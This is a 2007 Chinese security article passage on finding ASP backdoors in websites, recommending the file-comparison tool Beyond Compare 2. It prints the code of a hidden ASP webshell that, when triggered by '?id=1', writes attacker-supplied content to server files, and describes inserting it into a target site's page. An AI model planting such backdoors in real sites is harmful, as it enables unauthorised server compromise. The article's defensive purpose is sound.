彻底找出WEB空间中的ASP后门！

全站搜索

首页 -> 技术学院 -> 系统安全 -> 安全文摘

2007-01-05 作者：EASUN编辑阅读量：

三．技巧3：用Beyond Compare 2进行对比

上面的利用FTP客户端对比文件的方法，虽然有效，但是遇到渗透入文件的asp木马，那就无能为力了，这里介绍一款渗透性asp木马，可以将代码插入到指定web文件中，平常情况下不会显示，只有使用触发语句才能打开asp木马，其隐蔽性非常高。代码如下：

〈%

on error resume next

id=request("id")

if request("id")=1 then

testfile=Request.form("name")

msg=Request.form("message")

set fs=server.CreatObject("scripting.filesystemobject")

set thisfile=fs.openTestFile(testfile,8,True,0)

thisfile.Writeline(""&msg&"")

thisfile.close

set fs=nothing

%〉

〈from method="post" Action="保存"?id=1〉

〈input type="text" size="20" name="Name"

Value=〈%=server.mappath("XP.ASP")%〉〉

〈textarea name="Message" class=input〉

〈/textarea〉

〈input type="Submit" name="send" Value="生成"

class=input〉

〈/from〉

〈%end if%〉

注意：在修改目标主机的web文件时，要注意这样的文件修改后没有效果，即含有类似于：〈!--#include file="inc/conn.asp"--〉这样的文件包含命令，这样的代码存在时，加入asp代码后根本不会显示出脚本后门，但是脚本后门代码不会影响原文件的显示和功能。

假如已经对目标服务器www.target.com下的一个editor_InsertPic.asp文件进行了修改，插入了脚本后门代码，那么打开的方式是：www. target..com/editor_InsertPic.asp?id=1,注意后门的字符?id=1，有了这些字符，才能保证脚本后门显示出来！普通情况下打开www. target..com/editor_InsertPic.asp?id=1，是不会露出破绽的。

这招真是asp木马放置中非常狠的，如果遇到这样的情况，该怎么办？我们可以利用一款专业的文件对比工具Beyond Compare 2来完成木马的查找。

Beyond Compare 2一款不可多得的专业级的文件夹和文件对比工具。使用它可以很方便的对比出两个文件夹或者文件的不同之处。并把相差的每一个字节用颜色加以表示，查看方便。并且支持多种规则对比。

责任编辑：EASUN
文章来源：PCICP.COM 2007-01-05